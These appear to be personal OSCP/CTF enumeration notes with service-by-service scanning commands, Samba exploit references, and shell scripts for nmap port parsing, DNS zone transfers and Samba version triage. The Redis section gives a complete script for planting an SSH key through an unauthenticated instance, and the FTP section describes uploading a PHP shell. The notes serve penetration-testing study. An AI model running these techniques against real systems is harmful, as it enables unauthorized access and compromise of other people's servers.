Enumeration
https://github.com/s0wr0b1ndef/OSCP-note/
Disclaimer: These notes are not in the context of any machines I had during the OSCP lab or exam. This is purely my experience with CTFs, Tryhackme, Vulnhub, and Hackthebox prior to enrolling in OSCP. This is an approach I came up with while researching offensive security. It contains content from other blogs for my quick reference.
Port Scanning :
Scanning all 65535 ports :
-sC : default scripts, -sV : version detection, -oA : write all three output formats (normal, grepable, XML) under one basename. -p- covers all 65535 TCP ports; without it nmap only scans its top 1000
Optional : -sT (full TCP connect scan instead of the default SYN half-open scan. Needed when you lack raw-socket privileges, and some IDS/firewall rules flag half-open scans while a completed handshake looks like a normal connection; the trade-off is that it is slower and every connection shows up in the service's own logs)
From Apache version to Ubuntu version -> search "ubuntu httpd versions" : the apache2 package build reported by -sV maps to a specific Ubuntu release, which narrows down the kernel and the privilege-escalation paths worth trying
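The two-stage scan these notes imply, as an added example of my own (not a command from the original notes): a fast sweep of all 65535 TCP ports written in grepable format, then -sC -sV limited to the ports actually found open. The parser is exercised offline on a constructed -oG line; the ./nmap output directory and the --min-rate value are my assumptions.

```shell
#!/bin/sh
# Added example: two-stage nmap scan. Stage 1 sweeps all 65535 TCP ports
# quickly (-oG for easy parsing); stage 2 runs -sC -sV only on open ports.

# Extract open TCP ports from an nmap -oG file as a comma-separated list.
# A grepable "Host:" line carries e.g. "Ports: 22/open/tcp//ssh//OpenSSH 7.2/, 80/open/..."
open_ports_from_gnmap() {   # $1 = path to .gnmap file
    grep '^Host:' "$1" \
      | sed -n 's/.*Ports: //p' \
      | tr ',' '\n' \
      | sed 's/^[[:space:]]*//' \
      | awk -F/ '$2 == "open" && $3 == "tcp" { print $1 }' \
      | sort -n | uniq \
      | tr '\n' ',' | sed 's/,$//'
}

# Run both stages against a live target (assumption: a writable ./nmap directory).
two_stage_scan() {   # $1 = target IP or hostname
    mkdir -p nmap
    nmap -p- --min-rate 1000 -oG "nmap/$1.allports.gnmap" "$1" > /dev/null
    ports=$(open_ports_from_gnmap "nmap/$1.allports.gnmap")
    if [ -z "$ports" ]; then
        echo "no open TCP ports found on $1" >&2
        return 1
    fi
    echo "open ports: $ports" >&2
    nmap -sC -sV -p "$ports" -oA "nmap/$1.targeted" "$1"
}

# Constructed sample of grepable output (not real scan data) to exercise the
# parser offline: three open ports, one filtered, plus the status line.
SAMPLE_GNMAP=$(mktemp)
{
  printf '# Nmap 7.91 scan initiated (constructed sample)\n'
  printf 'Host: 10.10.10.5 ()\tStatus: Up\n'
  printf 'Host: 10.10.10.5 ()\tPorts: 22/open/tcp//ssh//OpenSSH 7.2p2 Ubuntu/, 80/open/tcp//http//Apache httpd 2.4.18 ((Ubuntu))/, 445/open/tcp//microsoft-ds//Samba smbd 3.X - 4.X/, 8080/filtered/tcp//http-proxy///\tIgnored State: closed (65531)\n'
} > "$SAMPLE_GNMAP"

open_ports_from_gnmap "$SAMPLE_GNMAP"   # 22,80,445

# With a target on the command line, run the real thing.
if [ -n "${1:-}" ]; then
    two_stage_scan "$1"
fi
```

Filtered ports are deliberately left out of the second stage; if the sweep shows many filtered ports, re-run it with -sT or from a different source address before deciding they are closed.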
FTP : (Port 21)
anonymous login check
ftp <ip address>
username : anonymous
password : anonymous (any value is accepted for anonymous logins; the convention is an email address)
file upload -> put shell.php (switch to binary mode first; if the FTP root is writable and is also the web root, the uploaded file can be executed by requesting it over HTTP)
SSH : (Port 22)
id_rsa.pub : public key. Placing it in a user's ~/.ssh/authorized_keys on the target allows login with the matching private key
id_rsa : private key used for login. It may be passphrase-protected; extract the hash with ssh2john and crack it with john
ssh -i id_rsa user@10.10.10.x (the key file must be readable only by you, chmod 600, or ssh refuses to use it)
For passwordless login, add id_rsa.pub to the target user's authorized_keys
DNS Zone transfer check : (Port 53)
If port 53 is open, test for a zone transfer (AXFR). Add the host to /etc/hosts first, then:
dig axfr smasher.htb @10.10.10.135
Add every name the transfer returns (subdomains, NS hosts) to /etc/hosts and dig again, since each one may be a separate virtual host. A "Transfer failed." reply means AXFR is restricted, which is the correct configuration, so move on
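Turning an AXFR result into /etc/hosts entries is the step that gets tedious by hand once a zone returns a dozen names; the script below is an added example of mine, not part of the original notes. The zone contents are constructed, not real records for smasher.htb, and the hosts file path is a parameter so the append can be tried against a scratch copy before touching /etc/hosts.

```shell
#!/bin/sh
# Added example: convert "dig axfr" output into /etc/hosts lines and append
# them without duplicating IPs that are already present.

# Read dig AXFR output on stdin, print "ip name1 name2 ..." per IP.
# dig prints records as: name  ttl  IN  type  rdata ; only A records are used,
# the trailing dot is stripped, and each name appears once.
axfr_to_hosts() {
    awk '$1 !~ /^;/ && $4 == "A" {
            name = $1; sub(/\.$/, "", name)
            if (!(name in seen)) { seen[name] = 1; names[$5] = names[$5] " " name }
         }
         END { for (ip in names) print ip names[ip] }' \
    | sort
}

# Append lines from $1 ("ip names...") to the hosts file $2 unless that IP
# already has an entry there. Defaults to /etc/hosts (needs root then).
add_to_hosts() {   # $1 = file of hosts lines, $2 = hosts file (default /etc/hosts)
    hosts=${2:-/etc/hosts}
    while read -r ip rest; do
        [ -n "$ip" ] || continue
        ip_re=$(printf '%s' "$ip" | sed 's/\./\\./g')   # escape dots for grep
        if ! grep -q "^${ip_re}[[:space:]]" "$hosts"; then
            printf '%s %s\n' "$ip" "$rest" >> "$hosts"
        fi
    done < "$1"
}

# Constructed AXFR response (not real data for smasher.htb) for an offline run.
SAMPLE_AXFR='; <<>> DiG 9.16.1 <<>> axfr smasher.htb @10.10.10.135
;; global options: +cmd
smasher.htb.        604800  IN  SOA  ns1.smasher.htb. admin.smasher.htb. 3 604800 86400 2419200 604800
smasher.htb.        604800  IN  NS   ns1.smasher.htb.
smasher.htb.        604800  IN  A    10.10.10.135
ns1.smasher.htb.    604800  IN  A    10.10.10.135
www.smasher.htb.    604800  IN  A    10.10.10.135
dev.smasher.htb.    604800  IN  A    10.10.10.136
smasher.htb.        604800  IN  SOA  ns1.smasher.htb. admin.smasher.htb. 3 604800 86400 2419200 604800
;; Query time: 5 msec'

HOSTS_LINES=$(mktemp); SCRATCH_HOSTS=$(mktemp)
printf '%s\n' "$SAMPLE_AXFR" | axfr_to_hosts > "$HOSTS_LINES"
cat "$HOSTS_LINES"
# 10.10.10.135 smasher.htb ns1.smasher.htb www.smasher.htb
# 10.10.10.136 dev.smasher.htb

printf '127.0.0.1 localhost\n' > "$SCRATCH_HOSTS"
add_to_hosts "$HOSTS_LINES" "$SCRATCH_HOSTS"
add_to_hosts "$HOSTS_LINES" "$SCRATCH_HOSTS"   # second run adds nothing
cat "$SCRATCH_HOSTS"
```

For a real zone, run `dig axfr domain @ip | axfr_to_hosts > hosts.txt`, review the file (CNAME targets and names in other zones are not resolved here), then `add_to_hosts hosts.txt` as root.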
RPC Bind (111)
RPC (135)
SMB (139 & 445)
https://0xdf.gitlab.io/2018/12/02/pwk-notes-smb-enumeration-checklist-update1.html
SMB Exploits :
Samba "username map script" Command Execution - CVE-2007-2447
Samba 3.0.20 through 3.0.25rc3, only when the "username map script" option is set in smb.conf
Samba-usermap-exploit.py - https://gist.github.com/joenorton8014/19aaa00e0088738fc429cff2669b9851
Eternal Blue - CVE-2017-0144 (MS17-010)
SMB v1 in Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016
SambaCry - CVE-2017-7494
Samba 3.5.0 through 4.6.3 (fixed in 4.6.4, 4.5.10 and 4.4.14). Needs a share you can write to and the server-side path of that share, since the payload is a shared library uploaded there and loaded by smbd
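As an added triage helper of my own (not from the notes or any of the linked exploits), the version ranges listed above turned into a check against the Samba version that nmap's smb-os-discovery reports. It is a hint only: the real test is still the exploit or nmap's smb-vuln-* scripts, and EternalBlue concerns Windows SMBv1 rather than Samba, so it is checked separately with --script smb-vuln-ms17-010. The banner string is constructed.

```shell
#!/bin/sh
# Added example: Samba version triage against the ranges listed above.
# Version strings such as "4.3.11-Ubuntu" or "3.0.25rc3" are compared on the
# numeric major.minor.patch only; suffixes are dropped, so 3.0.25rc3 and the
# fixed 3.0.25 release compare equal (over-inclusive on purpose: confirm by hand).

# ver_le A B : exit 0 if A <= B numerically (first three components).
ver_le() {
    awk -v a="$1" -v b="$2" 'BEGIN {
        sub(/[^0-9.].*$/, "", a); sub(/[^0-9.].*$/, "", b)
        n = split(a, x, "."); m = split(b, y, ".")
        for (i = 1; i <= 3; i++) {
            xi = (i <= n) ? x[i] + 0 : 0
            yi = (i <= m) ? y[i] + 0 : 0
            if (xi < yi) exit 0
            if (xi > yi) exit 1
        }
        exit 0
    }'
}

# Pull the Samba version out of an smb-os-discovery line such as
# "OS: Windows 6.1 (Samba 4.3.11-Ubuntu)". Prints nothing if absent.
samba_version_from_banner() {
    printf '%s\n' "$1" | sed -n 's/.*(Samba \([^)]*\)).*/\1/p'
}

# Print the CVEs from the notes whose affected range contains the version.
samba_cve_candidates() {   # $1 = Samba version string
    v=$1
    # CVE-2007-2447: 3.0.20 through 3.0.25rc3 (needs "username map script" in smb.conf)
    if ver_le 3.0.20 "$v" && ver_le "$v" 3.0.25; then
        echo CVE-2007-2447
    fi
    # CVE-2017-7494 (SambaCry): 3.5.0 onwards, fixed in 4.6.4, 4.5.10 and 4.4.14
    if ver_le 3.5.0 "$v" && ver_le "$v" 4.6.3 \
       && ! { ver_le 4.5.10 "$v" && ver_le "$v" 4.5.999; } \
       && ! { ver_le 4.4.14 "$v" && ver_le "$v" 4.4.999; }; then
        echo CVE-2017-7494
    fi
}

# Constructed banner in the shape smb-os-discovery prints (not real output).
BANNER='OS: Windows 6.1 (Samba 4.3.11-Ubuntu)'
samba_cve_candidates "$(samba_version_from_banner "$BANNER")"   # CVE-2017-7494
samba_cve_candidates 3.0.20-Debian                                 # CVE-2007-2447
samba_cve_candidates 4.5.10                                        # nothing: patched
```

When -sV only reports "Samba smbd 3.X - 4.X", get the exact version from `nmap -p445 --script smb-os-discovery <ip>` before feeding it to the check.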
SNMP (161)
IRC (194,6667,6660-7000)
nmap -sV --script irc-botnet-channels,irc-info,irc-unrealircd-backdoor -p 194,6660-7000 irked.htb
NFS (2049)
showmount -e 10.1.1.27
mkdir /mnt/nfs
mount -t nfs 192.168.2.4:/nfspath-shown /mnt/nfs
Permission denied ? The export usually has root_squash, so your root is mapped to nobody. Files are checked by numeric uid/gid, so create a local user with the same uid as the file owner shown by ls -ln on the mount and work as that user (https://blog.christophetd.fr/write-up-vulnix/)
MYSQL (3306)
nmap -sV -Pn -vv 10.0.0.1 -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122
mysql-empty-password, mysql-enum, mysql-info and the CVE-2012-2122 check run unauthenticated; the scripts that actually query the server (mysql-databases, mysql-users, mysql-variables, mysql-query, mysql-dump-hashes) need valid credentials passed with --script-args mysqluser=<user>,mysqlpass=<password>, and mysql-audit takes its own mysql-audit.* arguments
Redis (6379)
In the output of config get dir (or config get *) you can find the working directory of the redis process, usually /var/lib/redis (the redis user's home), whose SSH key directory would be /var/lib/redis/.ssh (or /home/redis/.ssh). Knowing this, you know where to write an authorized_keys file to get SSH access as the redis user. If you know the home directory of another valid user and redis has write permission on its .ssh directory, you can abuse it the same way:
Generate an ssh public-private key pair on your pc :
ssh-keygen -t rsa
Write the public key to a file, padded with blank lines so it sits on its own line inside the binary RDB dump :
(echo -e "\n\n"; cat ~/.ssh/id_rsa.pub; echo -e "\n\n") > foo.txt
Import the file into redis :
cat foo.txt | redis-cli -h 10.10.10.10 -x set crackit
Save the public key to the authorized_keys file on the redis server (the dump is written as the redis user, so that user needs write access to the target .ssh directory, and any existing authorized_keys there is overwritten) :
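The complete sequence behind the steps above, as an added example in shell rather than the notes' own command lines (my code, not from the source these notes quote): the padding function is exercised offline on a constructed key string, and the Redis part only runs against a host you pass in. The key name crackit and the /var/lib/redis/.ssh target follow the text above; the hostname, file names and the redis login user are assumptions.

```shell
#!/bin/sh
# Added example: write an SSH public key into a user's authorized_keys through
# an unauthenticated Redis instance, using CONFIG SET dir/dbfilename + SAVE.

# Wrap the public key in blank lines. SAVE writes a binary RDB file, so the
# key must sit on its own line between the RDB header and trailer; sshd
# ignores lines it cannot parse, so the binary noise around it is harmless.
pad_pubkey() {   # $1 = path to id_rsa.pub ; padded content on stdout
    printf '\n\n'
    cat "$1"
    printf '\n\n'
}

# Plant the padded key. The RDB file is written as the redis user, so the
# target directory must exist and be writable by it (CONFIG SET dir fails
# otherwise); an existing authorized_keys there is overwritten, and the
# instance's dump location is changed, so restore dir/dbfilename afterwards.
redis_plant_key() {   # $1 = host, $2 = padded key file, $3 = target .ssh dir
    redis-cli -h "$1" config get dir                      # note the current dir first
    redis-cli -h "$1" -x set crackit < "$2"
    redis-cli -h "$1" config set dir "$3"
    redis-cli -h "$1" config set dbfilename authorized_keys
    redis-cli -h "$1" save
}

# Constructed key line (not a real key) to exercise pad_pubkey offline.
PUBKEY_FILE=$(mktemp)
printf 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQ-constructed-sample attacker@kali\n' > "$PUBKEY_FILE"
PADDED_FILE=$(mktemp)
pad_pubkey "$PUBKEY_FILE" > "$PADDED_FILE"
wc -l < "$PADDED_FILE"   # 5: two blank lines, the key, two blank lines

# With host and target directory given, plant the key and try the login as the
# user that owns that directory (assumed: redis for /var/lib/redis/.ssh).
if [ -n "${1:-}" ] && [ -n "${2:-}" ]; then
    redis_plant_key "$1" "$PADDED_FILE" "$2"
    ssh -i ~/.ssh/id_rsa "${3:-redis}@$1"
fi
```

Usage: `sh redis_key.sh 10.10.10.10 /var/lib/redis/.ssh redis`. If `config set dir` returns an error, the .ssh directory does not exist or is not writable by the redis user; Redis cannot create it, so pick a user whose .ssh directory already exists.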
Port Knocking :
Misc :
IF NOTHING WORKS